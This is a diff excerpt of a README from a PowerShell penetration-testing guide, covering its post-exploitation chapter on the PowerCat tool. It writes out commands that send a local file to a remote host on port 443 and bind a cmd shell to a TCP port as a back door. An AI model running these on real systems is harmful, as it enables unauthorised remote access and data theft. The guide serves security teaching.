snowcapcyber/PowerShell-for-Penetration-Testing/README.md

 PS C:\> Invoke-Command -ComputerName dc03.snowcapcyber.co.uk -ScriptBlock { Get-HotFix }
 ```

+## Chapter 20 - Post Exploitation

-We can also use PowerShell to create a back door to the target system.
+There are a number of tools we can use to post exploitation to help us establish some form of command and control.
+We can use PowerShell to create a back door to the target system.

 * [PowerCat](https://github.com/besimorhino/powercat)

 The [PowerCat](https://github.com/besimorhino/powercat) tool allows us to send and receive data as well as bind a shell to a TCP port.
 By default, [PowerCat](https://github.com/besimorhino/powercat) reads input from the console and writes input to the console using write-host.
 In the following we will use [PowerCat](https://github.com/besimorhino/powercat) to receive some data.

 ```powershell
 PS C:\> powercat -l -p 8000 -of C:\inputfile
 ```

 In the following we will use [PowerCat](https://github.com/besimorhino/powercat) to send some data to the target 10.1.1.1

 ```powershell
 PS C:\> powercat -c 10.1.1.1 -p 443 -i C:\inputfile
 ```

 We can also use [PowerCat](https://github.com/besimorhino/powercat) to bind a TCP port to shell.

 ```powershell
 PS C:\> powercat -l -p 443 -e cmd
 ```